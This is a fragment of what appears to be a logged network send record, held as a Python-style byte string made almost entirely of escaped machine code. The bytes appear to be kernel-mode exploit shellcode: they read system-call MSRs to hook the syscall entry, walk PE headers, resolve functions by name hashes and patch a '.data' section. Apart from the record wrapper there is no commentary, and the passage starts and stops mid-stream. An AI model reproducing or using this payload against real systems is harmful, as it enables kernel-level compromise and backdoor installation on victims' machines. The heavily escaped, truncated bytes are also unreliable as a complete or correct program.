\\\x01\\\\x00\\\\x00\\\\x8bU\\\\xd0\\\\x81\\\\xea(\\\\x01\\\\x00\\\\x00\\\\x0f\\\\x8c3\\\\x01\\\\x00\\\\x00\\\\x89U\\\\xd0P\\\\xe8?\\\\x02\\\\x00\\\\x00H\\\\x89\\\\xc2X\\\\xb9\\\\xfa<\\\\xad\\\\xc2H9\\\\xcat\\\\n\\\\xb9\\\\x1a\\\\xbdK+H9\\\\xcau\\\\xcaH\\\\x8bp\\\\xe8H\\\\x89\\\\xd9\\\\xffU\\\\xe8H\\\\x89\\\\xf0H1\\\\xd2H\\\\x89\\\\xc3\\\\x8bP<H\\\\x01\\\\xd0H\\\\x89\\\\xc6H1\\\\xc9H\\\\x89\\\\xcaf\\\\x8bH\\\\x06f\\\\x8bP\\\\x14H\\\\x01\\\\xd6H\\\\x83\\\\xc6\\\\x18H\\\\xbf.data\\\\x00\\\\x00\\\\x00H\\\\x83\\\\xf9\\\\x00\\\\x0f\\\\x84\\\\xcd\\\\x00\\\\x00\\\\x00H\\\\x8b\\\\x06H9\\\\xf8t\\\\tH\\\\x83\\\\xc6(H\\\\xff\\\\xc9\\\\xeb\\\\xe5\\\\x8bF\\\\x0c\\\\x8bN\\\\x08H\\\\x01\\\\xc6H\\\\xbb\\\\xfe\\\\xfe\\\\xfe\\\\xfe\\\\xfe\\\\xfe\\\\xfe\\\\xfeH\\\\x83\\\\xe9\\\\x08H\\\\x83\\\\xf9\\\\x00\\\\x0f\\\\x8c\\\\x9b\\\\x00\\\\x00\\\\x00H\\\\x8b>H9\\\\xdfu\\\\x0cL\\\\x8b\\\\x86\\\\x98\\\\x00\\\\x00\\\\x00M\\\\x85\\\\xc0t\\\\x06H\\\\x83\\\\xc6\\\\x08\\\\xeb\\\\xd8H\\\\x83\\\\xc6\\\\x08H\\\\x89u\\\\xe0H1\\\\xc9\\\\xba\\\\xf0\\\\x0f\\\\x00\\\\x00\\\\xffU\\\\xf0H\\\\x85\\\\xc0tiI\\\\x89\\\\xc1H1\\\\xc0\\\\xb9\\\\x00\\\\x04\\\\x00\\\\x00L\\\\x89\\\\xcf\\\\xf3\\\\xabL\\\\x89\\\\xcfH\\\\x83\\\\xc7`H\\\\x8d5\\\\x91\\\\x02\\\\x00\\\\x00H1\\\\xc9f\\\\xb96\\\\x02\\\\xf3\\\\xa4M\\\\x89\\\\tH\\\\x8b]\\\\xf8I\\\\x89Y\\\\x08H1\\\\xdfH\\\\x8b]\\\\xf0I\\\\x89Y\\\\x10H1\\\\xdfH\\\\x8b]\\\\xe8I\\\\x89Y\\\\x18H1\\\\xdfH\\\\x8b]\\\\xe0I\\\\x89Y H1\\\\xdfA\\\\x89yDH\\\\x8bE\\\\xe0H\\\\x83\\\\xc0pI\\\\x83\\\\xc1`L\\\\x89\\\\x08H\\', 0.0)', '(\\'send\\', 18, b\\'\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x03\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x03\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\xb0\\\\x00\\\\xd0\\\\xff\\\\xff\\\\xff\\\\xff\\\\xff\\\\xb0\\\\x00\\\\xd0\\\\xff\\\\xff\\\\xff\\\\xff\\\\xff\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\xc0\\\\xf0\\\\xdf\\\\xff\\\\xc0\\\\xf0\\\\xdf\\\\xff\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x90\\\\xf1\\\\xdf\\\\xff\\\\x00\\\\x00\\\\x00\\\\x00\\\\xf0\\\\xf1\\\\xdf\\\\xff\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\xf0\\\\x01\\\\xd0\\\\xff\\\\xff\\\\xff\\\\xff\\\\xff\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x02\\\\xd0\\\\xff\\\\xff\\\\xff\\\\xff\\\\xff\\\\x001\\\\xc0@\\\\x90t\\\\x08\\\\xe8\\\\t\\\\x00\\\\x00\\\\x00\\\\xc2$\\\\x00\\\\xe8\\\\xa7\\\\x00\\\\x00\\\\x00\\\\xc3\\\\xe8\\\\x01\\\\x00\\\\x00\\\\x00\\\\xeb\\\\x90[\\\\xb9v\\\\x01\\\\x00\\\\x00\\\\x0f2\\\\xa3\\\\xfc\\\\xff\\\\xdf\\\\xff\\\\x8dC\\\\x171\\\\xd2\\\\x0f0\\\\xc3\\\\xb9#\\\\x00\\\\x00\\\\x00j0\\\\x0f\\\\xa1\\\\x8e\\\\xd9\\\\x8e\\\\xc1d\\\\x8b\\\\r@\\\\x00\\\\x00\\\\x00\\\\x8ba\\\\x04\\\\xff5\\\\xfc\\\\xff\\\\xdf\\\\xff`\\\\x9cj#R\\\\x9cj\\\\x02\\\\x83\\\\xc2\\\\x08\\\\x9d\\\\x80L$\\\\x01\\\\x02j\\\\x1b\\\\xff5\\\\x04\\\\x03\\\\xdf\\\\xffj\\\\x00USVWd\\\\x8b\\\\x1d\\\\x1c\\\\x00\\\\x00\\\\x00j;\\\\x8b\\\\xb3$\\\\x01\\\\x00\\\\x00\\\\xff31\\\\xc0H\\\\x89\\\\x03\\\\x8bn(j\\\\x01\\\\x83\\\\xecH\\\\x81\\\\xed\\\\x9c\\\\x02\\\\x00\\\\x00\\\\xa1\\\\xfc\\\\xff\\\\xdf\\\\xff\\\\xb9v\\\\x01\\\\x00\\\\x001\\\\xd2\\\\x0f0\\\\xfb\\\\xe8\\\\x11\\\\x00\\\\x00\\\\x00\\\\xfad\\\\x8b\\\\r@\\\\x00\\\\x00\\\\x00\\\\x8ba\\\\x04\\\\x83\\\\xec(\\\\x9da\\\\xc3\\\\xe9\\\\xef\\\\x00\\\\x00\\\\x00\\\\xb9\\\\x82\\\\x00\\\\x00\\\\xc0\\\\x0f2H\\\\xbb\\\\xf8\\\\x0f\\\\xd0\\\\xff\\\\xff\\\\xff\\\\xff\\\\xff\\\\x89S\\\\x04\\\\x89\\\\x03H\\\\x8d\\\\x05\\\\n\\\\x00\\\\x00\\\\x00H\\\\x89\\\\xc2H\\\\xc1\\\\xea \\\\x0f0\\\\xc3\\\\x0f\\\\x01\\\\xf8eH\\\\x89$%\\\\x10\\\\x00\\\\x00\\\\x00eH\\\\x8b$%\\\\xa8\\\\x01\\\\x00\\\\x00PSQRVWUAPAQARASATAUAVAWj+e\\\\xff4%\\\\x10\\\\x00\\\\x00\\\\x00ASj3QL\\\\x89\\\\xd1H\\\\x83\\\\xec\\\\x08UH\\\\x81\\\\xecX\\\\x01\\\\x00\\\\x00H\\\\x8d\\\\xac$\\\\x80\\\\x00\\\\x00\\\\x00H\\\\x89\\\\x9d\\\\xc0\\\\x00\\\\x00\\\\x00H\\\\x89\\\\xbd\\\\xc8\\\\x00\\\\x00\\\\x00H\\\\x89\\\\xb5\\\\xd0\\\\x00\\\\x00\\\\x00H\\\\xa1\\\\xf8\\\\x0f\\\\xd0\\\\xff\\\\xff\\\\xff\\\\xff\\\\xffH\\\\x89\\\\xc2H\\\\xc1\\\\xea H1\\\\xdb\\\\xff\\\\xcbH!\\\\xd8H1\\\\xc9\\\\xb9\\\\x82\\\\x00\\\\x00\\\\xc0\\\\x0f0\\\\xfb\\\\xe88\\\\x00\\\\x00\\\\x00\\\\xfaeH\\\\x8b$%\\\\xa8\\\\x01\\\\x00\\\\x00H\\\\x83\\\\xecxA_A^A]A\\\\\\\\A[AZAYAX]_^ZY[XeH\\\\x8b$%\\\\x10\\\\x00\\\\x00\\\\x00\\\\x0f\\\\x01\\\\xf8\\\\xff$%\\\\xf8\\\\x0f\\\\xd0\\\\xff1\\\\xc0@\\\\x90\\\\x0f\\\\x84\\\\xb5\\\\x05\\\\x00\\\\x00\\\\xe8\\\\x00\\\\x00\\\\x00\\\\x00X`\\\\x89\\\\xc3\\\\x89\\\\xe5\\\\x83\\\\xecHd\\\\x8b\\\\r8\\\\x00\\\\x00\\\\x00f\\\\x8bA\\\\x06\\\\xc1\\\\xe0\\\\x10f\\\\x8b\\\\x01f%\\\\x00\\\\xf0\\\\x8b\\\\x08f\\\\x81\\\\xf9MZt\\\\x07-\\\\x00\\\\x10\\\\x00\\\\x00\\\\xeb\\\\xf0\\\\x89E\\\\xfcS\\\\x89\\\\xc3\\\\xb9\\\\x94\\\\x01i\\\\xe3\\\\xe8>\\\\x01\\\\x00\\\\x00\\\\x89E\\\\xf8\\\\xb9\\\\x85T\\\\x83\\\\xf0\\\\xe81\\\\x01\\\\x00\\\\x00\\\\x89E\\\\xf4\\\\xb9.[Q\\\\xd2\\\\xe8$\\\\x01\\\\x00\\\\x00\\\\x89E\\\\xec[\\\\x8dU\\\\xe81\\\\xc9\\\\x89\\\\nRj\\\\x00Rj\\\\x0b\\\\xff\\\\xd0\\\\x8bU\\\\xe8\\\\x85\\\\xd2\\\\x0f\\\\x84\\\\x02\\\\x01\\\\x00\\\\x00Rj\\\\x00\\\\xffU\\\\xf8\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\xf4\\\\x00\\\\x00\\\\x00Pj\\\\x00\\\\xffu\\\\xe8Pj\\\\x0b\\\\xffU\\\\xec\\\\x85\\\\xc0\\\\x0f\\\\x85\\\\xe0\\\\x00\\\\x00\\\\x00XP-\\\\xfc\\\\x00\\\\x00\\\\x00\\\\x05\\\\x1c\\\\x01\\\\x00\\\\x00P\\\\xe8\\\\x80\\\\x01\\\\x00\\\\x00\\\\xb9\\\\xfa<\\\\xad\\\\xc29\\\\xc8t\\\\x1e\\\\xb9\\\\x1a\\\\xbdK+9\\\\xc8t\\\\x15X\\\\x8bU\\\\xe8\\\\x81\\\\xea\\\\x1c\\\\x01\\\\x00\\\\x00\\\\x0f\\\\x8c\\\\xac\\\\x00\\\\x00\\\\x00\\\\x89U\\\\xe8\\\\xeb\\\\xceX\\\\x8bp\\\\xec\\\\xffU\\\\xf4\\\\x89\\\\xf0PPh.datja\\\\xe8\\\\\\'\\\\x02\\\\x00\\\\x00\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\x88\\\\x00\\\\x00\\\\x00X\\\\x83\\\\xe9@\\\\xe8Z\\\\x02\\\\x00\\\\x00\\\\x85\\\\xc0t\\\\x15\\\\x8b\\\\x16\\\\xc1\\\\xea\\\\x18\\\\x89\\\\xf0\\\\xc1\\\\xe8\\\\x189\\\\xd0u\\\\x07\\\\x8bFH\\\\x85\\\\xc0t\\\\n\\\\x83\\\\xc6\\\\x04\\\\x83\\\\xe9\\\\x04\\\\xe3^\\\\xeb\\\\xd8\\\\x89u\\\\xf0Vh\\\\xf8\\\\x0f\\\\x00\\\\x00j\\\\x00\\\\xffU\\\\xf8\\\\x85\\\\xc0tJP\\\\x89\\\\xc71\\\\xc0\\\\x89\\\\xc1f\\\\x81\\\\xc1\\\\x00\\\\x04\\\\xf3\\\\xabX\\\\x89\\\\x00\\\\x8bU\\\\x04\\\\x89P\\\\x041\\\\xd7\\\\x8bU\\\\xf8\\\\x89P\\\\x081\\\\xd7\\\\x8bU\\\\xf4\\\\x89P\\\\x0c1\\\\xd7\\\\x8bU\\\\xf0\\\\x89P\\\\x101\\\\xd7\\\\x89x$\\\\x83\\\\xc0H\\\\x89\\\\xc7\\\\x8d\\\\xb3\\\\x96\\\\x03\\\\x00\\\\x00\\\\xb9\\\\x1a\\\\x02\\\\x00\\\\x00\\\\xf3\\\\xa4[\\\\x89C8\\\\x89\\\\xeca\\\\xc3SRQWU\\\\x89\\\\xe5\\\\x83\\\\xec\\\\x18\\\\x89\\\\xcf\\\\x89\\\\xd8\\\\x89E\\\\xfc\\\\xe8z\\\\x00\\\\x00\\\\x00\\\\x85\\\\xc0tm\\\\x89E\\\\xf8\\\\xe8\\\\xee\\\\x00\\\\x00\\\\x00\\\\x89E\\\\xf4\\\\x8bE\\\\xfc\\\\x8bM\\\\xf8\\\\xe8\\\\x0e\\\\x01\\\\x00\\\\x00\\\\x85\\\\xc0tS\\\\x89E\\\\xf0\\\\x8bE\\\\xfc\\\\x8bM\\\\xf8\\\\xe8\\\\x04\\\\x01\\\\x00\\\\x00\\\\x85\\\\xc0tA\\\\x89E\\\\xec\\\\x8bE\\\\xfc\\\\x8bM\\\\xf8\\\\xe8\\\\xfa\\\\x00\\\\x00\\\\x00\\\\x85\\\\xc0t/\\\\x89E\\\\xe8\\\\x8bE\\\\xfc\\\\x89\\\\xf9\\\\x8bU\\\\xec\\\\x8b]\\\\xf4\\\\xe8\\\\xab\\\\x00\\\\x00\\\\x00\\\\x85\\\\xc0t\\\\x18\\\\x89\\\\xc1\\\\x8bE\\\\xe8\\\\xe8\\\\xdd\\\\x00\\\\x00\\\\x00f\\\\x89\\\\xc2\\\\x8bE\\\\xfc\\\\x8bM\\\\xf0\\\\xe8\\\\xd7\\\\x00\\\\x00\\\\x00\\\\x83\\\\xc4\\\\x18]_YZ[\\\\xc3V\\\\x89\\\\xc6\\\\x83\\\\xc6<\\\\x8b6\\\\x01\\\\xc6f\\\\x81>PEu\\\\t\\\\x83\\\\xc6x\\\\x8b6\\\\x01\\\\xf0^\\\\xc31\\\\xc0\\\\xeb\\\\xfaVQW\\\\x89\\\\xc61\\\\xc0\\\\x89\\\\xc7\\\\xc1\\\\xe7\\\\x07)\\\\xc7\\\\x89\\\\xf81\\\\xc9\\\\x8a\\\\x0e\\\\x80\\\\xf9\\\\x00t\\\\x05\\\\x01\\\\xc8F\\\\xeb\\\\xe9_Y^\\\\xc3VWR\\\\x89\\\\xc61\\\\xc0\\\\x89\\\\xc7\\\\xc1\\\\xe7\\\\x07)\\\\xc7\\\\x89\\\\xf81\\\\xd2\\\\x8a\\\\x16\\\\x01\\\\xd0F\\\\xe2\\\\xeeZ_^\\\\xc3VQW\\\\x89\\\\xc61\\\\xc0\\\\x89\\\\xc7\\\\xc1\\\\xe7\\\\x07)\\\\xc7\\\\x89\\\\xf81\\\\xc9\\\\x8a\\\\x0e\\\\x80\\\\xf9\\\\x00t\\\\xc6\\\\x01\\\\xc8FF\\\\xeb\\\\xe8_Y^\\\\xc3\\\\x83\\\\xc0\\\\x18\\\\x8b\\\\x00\\\\xc3WVQ1\\\\xff\\\\x89\\\\xc69\\\\xdft\\\\x19\\\\x8b\\\\x04\\\\xba\\\\x01\\\\xf0\\\\xe8\\\\x83\\\\xff\\\\xff\\\\xff9\\\\xc8t\\\\x07G\\\\xeb\\\\xebY^_\\\\xc3\\\\x89\\\\xf8\\\\xeb\\\\xf81\\\\xc0\\\\xeb\\\\xf4\\\\x83\\\\xc1\\\\x1c\\\\x8b\\\\t\\\\x01\\\\xc8\\\\xc3\\\\x83\\\\xc1 \\\\x8b\\\\t\\\\x01\\\\xc8\\\\xc3\\\\x83\\\\xc1$\\\\x8b\\\\t\\\\x01\\\\xc8\\\\xc3\\\\xd1\\\\xe1\\\\x01\\\\xc8f\\\\x8b\\\\x00\\\\xc3\\\\x81\\\\xe2\\\\xff\\\\xff\\\\x00\\\\x00\\\\xc1\\\\xe2\\\\x02\\\\x01\\\\xd1\\\\x8b\\\\t\\\\x01\\\\xc8\\\\xc3RV\\\\x8bt$\\\\x0c\\\\x8bL$\\\\x101\\\\xd2\\\\xd1\\\\xe9\\\\x85\\\\xc9t\\\\x0c\\\\xc1\\\\xc2\\\\x05\\\\xacF\\\\x0c 0\\\\xc2I\\\\xeb\\\\xf0\\\\x89\\\\xd0^Z\\\\xc2\\\\x08\\\\x00XZ_^PV\\\\x89\\\\xf0\\\\x83\\\\xc6<\\\\x8b6\\\\x01\\\\xc61\\\\xc0\\\\x89\\\\xc1f\\\\x8bN\\\\x06f\\\\x8bF\\\\x14\\\\x01\\\\xc6\\\\x83\\\\xc6\\\\x18\\\\x85\\\\xc9t\\\\x1d\\\\x8b\\\\x069\\\\xf8u\\\\x07\\\\x8bF\\\\x049\\\\xd0t\\\\x06\\\\x83\\\\xc6(I\\\\xeb\\\\xe9\\\\x8bF\\\\x0c\\\\x8bN\\\\x08^\\\\x01\\\\xc6\\\\xc31\\\\xf6\\\\xc3`1\\\\xc0\\\\x83\\\\xf8\\\\x0ft\\\\x1e1\\\\xc9\\\\x8b<\\\\x86\\\\x8b\\\\x14\\\\x8e9\\\\xd7t\\\\x03Au\\\\xf3\\\\x0f\\\\xb6\\\\x94\\\\x03\\\\x87\\\\x03\\\\x00\\\\x009\\\\xd1u\\\\r@\\\\xeb\\\\xddA9\\\\xc8u\\\\x05a1\\\\xc0@\\\\xc3a1\\\\xc0\\\\xc3\\\\x00\\\\x01\\\\x02\\\\x03\\\\x04\\\\x05\\\\x06\\\\x07\\\\x08\\\\t\\\\n\\\\t\\\\t\\\\r\\\\x0e\\\\x8bL$\\\\x08`\\\\xe8\\\\x00\\\\x00\\\\x00\\\\x00]f\\\\x81\\\\xe5\\\\x00\\\\xf0\\\\x89M4\\\\xe8\\\\xd9\\\\x01\\\\x00\\\\x00\\\\xe8C\\\\x01\\\\x00\\\\x00\\\\xe8\\\\x7f\\\\x01\\\\x00\\\\x00\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\xe3\\\\x00\\\\x00\\\\x00\\\\x8b]<\\\\x8bK\\\\xd8\\\\xe8\\\\x17\\\\x01\\\\x00\\\\x00<#t\\\\r<wt\\\\x1c<\\\\xc8t\"\\\\xe9\\\\xb6\\\\x00\\\\x00\\\\x00\\\\x8bM8\\\\x8bE$\\\\x89A\\\\x0e1\\\\xc0\\\\x88A\\\\x12\\\\xe9\\\\x9f\\\\x00\\\\x00\\\\x00\\\\xe8\\\\x13\\\\x01\\\\x00\\\\x00\\\\xe9\\\\xb5\\\\x00\\\\x00\\\\x00\\\\x8b]<\\\\x8bC\\\\xe8\\\\x8b03u(\\\\x8bx\\\\x083}(\\\\x8b@\\\\x043E(;C\\\\x10\\\\x89\\\\xc3u{\\\\x8bM09\\\\xf1\\\\x8bE,t\\\\x18\\\\xe8\\\\xf2\\\\x00\\\\x00\\\\x00\\\\x8dF\\\\x04Pj\\\\x00\\\\xffU\\\\x08\\\\x85\\\\xc0tc\\\\x89E,\\\\x89u0\\\\x01\\\\xdf9\\\\xf7wS)\\\\xdf\\\\x01\\\\xc7W\\\\x89\\\\xf2\\\\x8bu<\\\\x8bv\\\\xf0\\\\x89\\\\xd9\\\\xf3\\\\xa4^\\\\x89\\\\xd9\\\\xc1\\\\xe9\\\\x02\\\\x8b](1\\\\x1e\\\\x83\\\\xc6\\\\x04\\\\xe2\\\\xf9\\\\x01\\\\xd09\\\\xc6|(\\\\x8bE,`\\\\x89\\\\xe6P\\\\xff\\\\xd0\\\\x89\\\\xf4a\\\\xe8\\\\xa1\\\\x00\\\\x00\\\\x00\\\\x8bE$\\\\xd1\\\\xe81\\\\xc9\\\\x88\\\\xc1\\\\x01\\\\xe9\\\\x8b\\\\t1\\\\xc8\\\\x89E$\\\\xe8h\\\\x00\\\\x00\\\\x00\\\\xb0\\\\x10\\\\xeb\\\\x08\\\\xb0 \\\\xeb\\\\x04\\\\xb00\\\\xeb\\\\x00\\\\x8bM8\\\\xb4\\\\x00f\\\\x01A\\\\x1e\\\\x8bE\\\\x10\\\\x89D$\\\\x1ca\\\\xff`<\\\\x8dEH\\\\x8bM\\\\x0c\\\\x89\\\\x88G\\\\x01\\\\x00\\\\x00\\\\x89\\\\xa8>\\\\x01\\\\x00\\\\x00f\\\\xb8\\\\x10\\\\x00\\\\x8bM8f\\\\x01A\\\\x1e\\\\x8bE\\\\x10\\\\x89D$\\\\x1cah\\\\x00\\\\x00\\\\x00\\\\x00\\\\x8b@<Ph\\\\x00\\\\x00\\\\x00\\\\x00\\\\xc31\\\\xc0\\\\x88\\\\xc8\\\\xc1\\\\xe9\\\\x08\\\\x00\\\\xc8\\\\xc1\\\\xe9\\\\x08\\\\x00\\\\xc8\\\\xc1\\\\xe9\\\\x08\\\\x00\\\\xc8\\\\xc3Q\\\\x8bE$\\\\x89\\\\xc1\\\\x0f\\\\xc9\\\\xd1\\\\xe01\\\\xc8\\\\x89E(Y\\\\xc3`\\\\xe8\\\\x0b\\\\x00\\\\x00\\\\x00\\\\x8bE\\\\x10\\\\x8bH<\\\\x89H8a\\\\xc3`\\\\x8b],\\\\x85\\\\xdbt\\\\r1\\\\xc0\\\\x89\\\\xdf\\\\x8bM0\\\\xf3\\\\xaaS\\\\xffU\\\\x0c1\\\\xc0\\\\x89E0\\\\x89E,a\\\\xc3WRV\\\\x89\\\\xcf\\\\x8bUD\\\\x8b\\\\n\\\\xe89\\\\x00\\\\x00\\\\x00\\\\x85\\\\xc0u\\\\x0e\\\\x83\\\\xc2\\\\x08\\\\x8b\\\\n\\\\xe8+\\\\x00\\\\x00\\\\x00\\\\x85\\\\xc0t!\\\\x89MDj\\\\x0cX\\\\x8dqT;\\\\x06t\\\\x07\\\\x83\\\\xc6\\\\x04;\\\\x06u\\\\r;F\\\\x04u\\\\x08\\\\x89u<1\\\\xc0@\\\\xeb\\\\x021\\\\xc0^Z_\\\\xc31\\\\xc09\\\\xc1}\\\\x01@\\\\xc3RQ1\\\\xd2f\\\\x8bQ\\\\x02\\\\x01\\\\xca;\\\\x11t\\\\x05\\\\x83\\\\xc1\\\\x04\\\\xeb\\\\xf7Z\\\\x8dA\\\\x1c\\\\x83\\\\xc0\\\\x07$\\\\xf8\\\\x89ED\\\\x8bA\\\\xf8\\\\x89E8\\\\x89\\\\xd1Z\\\\xc3SUWVATAUAVAWH\\\\x89\\\\xe5H\\\\x81\\\\xec\\\\x80\\\\x00\\\\x00\\\\x00f\\\\x83\\\\xe4\\\\xf0\\\\xe8\\\\x83\\\\x03\\\\x00\\\\x00H\\\\x89E\\\\xf8H\\\\x89\\\\xc3\\\\xb9.[Q\\\\xd2\\\\xe8\\\\xee\\\\x01\\\\x00\\\\x00H\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\xd5\\\\x01\\\\x00\\\\x00H\\\\x89\\\\xc6\\\\xb9\\\\x94\\\\x01i\\\\xe3\\\\xe8\\\\xd8\\\\x01\\\\x00\\\\x00H\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\xbf\\\\x01\\\\x00\\\\x00H\\\\x89E\\\\xf0H\\\\x89\\\\xc7\\\\xb9\\\\x85T\\\\x83\\\\xf0\\\\xe8\\\\xbe\\\\x01\\\\x00\\\\x00H\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\xa5\\\\x01\\\\x00\\\\x00H\\\\x89E\\\\xe8L\\\\x8dM\\\\xd0M1\\\\xc0L\\\\x89\\\\xc1D\\\\x89E\\\\xd0L\\\\x89\\\\xc2\\\\xb1\\\\x0b\\\\xff\\\\xd6D\\\\x8bE\\\\xd0E\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\x7f\\\\x01\\\\x00\\\\x00\\\\x8bU\\\\xd0H1\\\\xc9\\\\xff\\\\xd7H\\\\x85\\\\xc0\\\\x0f\\\\x84n\\\\x01\\\\x00\\\\x00H\\\\x89\\\\xc3H1\\\\xc9I\\\\x89\\\\xc9D\\\\x8bE\\\\xd0H\\\\x89\\\\xc2\\\\xb1\\\\x0b\\\\xff\\\\xd6H\\\\x85\\\\xc0\\\\x0f\\\\x85Q\\\\x01\\\\x00\\\\x00H\\\\x89\\\\xd8H-\\\\xf8\\\\x00\\\\x00\\\\x00H\\\\x05(\\\\x01\\\\x00\\\\x00\\\\x8bU\\\\xd0\\\\x81\\\\xea(\\\\x01\\\\x00\\\\x00\\\\x0f\\\\x8c3\\\\x01\\\\x00\\\\x00\\\\x89U\\\\xd0P\\\\xe8?\\\\x02\\\\x00\\\\x00H\\\\x89\\\\xc2X\\\\xb9\\\\xfa<\\\\xad\\\\xc2H9\\\\xcat\\\\n\\\\xb9\\\\x1a\\\\xbdK+H9\\\\xcau\\\\xcaH\\\\x8bp\\\\xe8H\\\\x89\\\\xd9\\\\xffU\\\\xe8H\\\\x89\\\\xf0H1\\\\xd2H\\\\x89\\\\xc3\\\\x8bP<H\\\\x01\\\\xd0H\\\\x89\\\\xc6H1\\\\xc9H\\\\x89\\\\xcaf\\\\x8bH\\\\x06f\\\\x8bP\\\\x14H\\\\x01\\\\xd6H\\\\x83\\\\xc6\\\\x18H\\\\xbf.data\\\\x00\\\\x00\\\\x00H\\\\x83\\\\xf9\\\\x00\\\\x0f\\\\x84\\\\xcd\\\\x00\\\\x00\\\\x00H\\\\x8b\\\\x06H9\\\\xf8t\\\\tH\\\\x83\\\\xc6(H\\\\xff\\\\xc9\\\\xeb\\\\xe5\\\\x8bF\\\\x0c\\\\x8bN\\\\x08H\\\\x01\\\\xc6H\\\\xbb\\\\xfe\\\\xfe\\\\xfe\\\\xfe\\\\xfe\\\\xfe\\\\xfe\\\\xfeH\\\\x83\\\\xe9\\\\x08H\\\\x83\\\\xf9\\\\x00\\\\x0f\\\\x8c\\\\x9b\\\\x00\\\\x00\\\\x00H\\\\x8b>H9\\\\xdfu\\\